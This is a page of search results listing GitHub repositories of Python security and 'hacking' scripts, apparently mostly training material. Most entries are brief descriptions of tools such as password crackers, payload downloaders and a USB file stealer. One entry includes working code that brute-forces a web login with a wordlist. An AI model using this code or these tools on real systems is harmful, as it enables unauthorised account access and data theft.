🌐
GitHub
github.com › SHathi28 › Ethical-Hacking-Python-Scripts
GitHub - SHathi28/Ethical-Hacking-Python-Scripts: Repository for security-related Python scripts. · GitHub
Repository for security-related Python scripts. Contribute to SHathi28/Ethical-Hacking-Python-Scripts development by creating an account on GitHub.
Starred by 211 users
Forked by 61 users
Languages   Python
🌐
GitHub
github.com › ninijay › pycurity
GitHub - ninijay/pycurity: Python Security Scripts
November 11, 2017 - This script will crack a pw- protected zip file with a dictionary list. It will create a pseudo- Thread for each dictionary_file line to speed up the process. ... Simplifies the process of creating a conficker exploit by handling all the configuration and launching the exploit via msf. ... python port_scanner.py -H <ip-adress> -p <single port> python port_scanner.py -H <ip-adress> -p "<mutliple ports separated by comma>" # eg for multiple port scan python port_scanner.py -H 127.0.0.1 -p "20, 21, 443"
Starred by 243 users
Forked by 47 users
Languages   Python 100.0% | Python 100.0%
🌐
GitHub
github.com › areebbeigh › hacker-scripts
GitHub - areebbeigh/hacker-scripts: A collection of Python scripts that make daily tasks easier and quicker. Hack your way through daily tasks with hacker-scripts! · GitHub
It is a great tool if you are a lazy computer user (like me) and want things done just with a single command from your command line. This software currently mostly contains scripts that work on Windows OS. Simply download the hacker-scripts package ...
Starred by 84 users
Forked by 30 users
Languages   Python
🌐
GitHub
github.com › linson-rodrigues › python-hacking-scripts
GitHub - linson-rodrigues/python-hacking-scripts · GitHub
download_execute_and_report_payload: Downloads and executes a file on a target system, then reports back. ... These tools focus on various aspects of network security, website hacking, and malware creation. Each tool is demonstrated and explained within the course, and you can find the complete Python scripts here.
Author   linson-rodrigues
🌐
GitHub
github.com › topics › python-for-hackers
python-for-hackers · GitHub Topics · GitHub
python hacking python-3 python-virus python-project python-for-hackers python-smtp fikrado-organization fikrado python-for-student python-spambot ... There are simple python scripts for penetration testing. Hacking with Python is a simple and extensible tool for getting started with ethical hacking activities and running python scripts.
🌐
GitHub
github.com › topics › hacker-scripts
hacker-scripts · GitHub Topics · GitHub
A collection of Python scripts that make daily tasks easier and quicker. Hack your way through daily tasks with hacker-scripts!
🌐
GitHub
github.com › Adastra-thw › pyHacks
GitHub - Adastra-thw/pyHacks: Python Scripts for Hacking .
Python Scripts for Hacking . Contribute to Adastra-thw/pyHacks development by creating an account on GitHub.
Starred by 508 users
Forked by 197 users
Languages   Python 100.0% | Python 100.0%
🌐
GitHub
github.com › topics › python-hacking
python-hacking · GitHub Topics · GitHub
linux security osint tools hacking python3 cybersecurity infosec pentesting pentest information-security information-gathering itsecurity redteaming python-hacking hackingtools osint-python penetration-testing-tools hackingwithpython infosectools ... Python script to automatically steal all the files and information from a computer using an USB device.
🌐
GitHub
github.com › Naategh › PyCk
GitHub - Naategh/PyCk: A collection of useful Python hacking scripts for beginners · GitHub
A collection of useful Python hacking scripts for beginners - Naategh/PyCk
Starred by 616 users
Forked by 100 users
Languages   Python 99.8% | Dockerfile 0.2%
Find elsewhere
🌐
GitHub
github.com › HarryCha777 › Hacking-Scripts
GitHub - HarryCha777/Hacking-Scripts: Hacking Scripts in Python
Use --help for more info.") return options options = get_arguments() target_url = options.url data_dict = {"username": "admin", "password": "", "Login": "submit"} with open(options.wordlist, "r") as wordlist_file: for line in wordlist_file: word = line.strip() data_dict["password"] = word response = requests.post(target_url, data=data_dict) if "Login failed" not in response.content: print("[+] Got the password --> " + word) exit() print("[+] Reached end of line.") ''' https://www.udemy.com/learn-python-and-ethical-hacking-from-scratch/learn/v4/t/lecture/10666162?start=0 (Guessing Login Information on Login Pages) ''' Simply download the Python scripts you would like to run and read the comments below each script to see the codes required to run before executing the scripts.
Author   HarryCha777
🌐
GitHub
github.com › jthemee › Hack-Python
GitHub - jthemee/Hack-Python: Python script for understanding hacking
Python script for understanding hacking . Contribute to jthemee/Hack-Python development by creating an account on GitHub.
Starred by 4 users
Forked by 7 users
Languages   Python 100.0% | Python 100.0%
🌐
GitHub
github.com › Tejas1510 › Hacking-Scripts
GitHub - Tejas1510/Hacking-Scripts: Hacking Scripts contains amazing and awesome scripts written in Python, JavaScript, Java, Nodejs, and more. The main aim of the repository will be to provide utility scripts that might make everyday life easy. · GitHub
This Project contains amazing and awesome scripts written in Python, JavaScript, Java, Nodejs and many more. The main aim of this repository is to provide utility scripts that could make everyday life easy. Get started with coding exhilarating scripts that can be useful to download PDFs from an Online Source or just to randomly accept bulk linkedin request.
Starred by 301 users
Forked by 297 users
Languages   Java 27.0% | Python 21.3% | Jupyter Notebook 19.2% | JavaScript 18.1% | HTML 4.6% | CSS 3.8%
🌐
GitHub
github.com › adviksinghania › ethical-hacking-scripts
GitHub - adviksinghania/ethical-hacking-scripts: A collection of Python scripts made for use in ethical hacking. · GitHub
A collection of Python scripts made for use in ethical hacking. - adviksinghania/ethical-hacking-scripts
Starred by 8 users
Forked by 9 users
Languages   Python
🌐
GitHub
github.com › x4nth055 › ethical-hacking-tools-python
GitHub - x4nth055/ethical-hacking-tools-python: Python programs & tools built in the Ethical Hacking with Python EBook · GitHub
The tools and scripts are built in the Ethical Hacking with Python Ebook.
Starred by 144 users
Forked by 52 users
Languages   Python
🌐
GitHub
github.com › amtzespinosa › python-hacking-tools
GitHub - amtzespinosa/python-hacking-tools: These are all the python tools and scripts I have crafted so far. I will be updating the repo as I code more or if any update needs to be made.
These are all the python tools and scripts I have crafted so far. I will be updating the repo as I code more or if any update needs to be made. - amtzespinosa/python-hacking-tools
Starred by 13 users
Forked by 4 users
Languages   Python 100.0% | Python 100.0%
🌐
GitHub
github.com › bing0o › Python-Scripts
GitHub - bing0o/Python-Scripts: Collection of Python Scripts
a Collection of simple python scripts, for penetration testing & automation, it's like I just save my scripts here and not all of them are useful.
Starred by 184 users
Forked by 74 users
Languages   Python 100.0% | Python 100.0%
🌐
GitHub
github.com › topics › python-for-hacking
python-for-hacking · GitHub Topics · GitHub
python python3 blackhat ethical-hacking macchanger blackhatethicalhacking ethicalhacking blackhatpython blackhat-python mac-changer ethical-hacking-tools mac-change blackhathacker python-for-hacking macchanger-tui python-for-ethical-hacker blackhathacking ethicalhackers ethicalhacker ... Offensive-Python is a collection of Python scripts and projects tailored for penetration testing and cybersecurity.
🌐
GitHub
github.com › TonyCha3713 › python-hacking-scripts
GitHub - TonyCha3713/python-hacking-scripts
TonyCha3713 / python-hacking-scripts Public · Notifications · You must be signed in to change notification settings · Fork 0 · Star 0 · 0 stars 0 forks Branches Tags Activity · Star · Notifications · You must be signed in to change notification settings ·
Author   TonyCha3713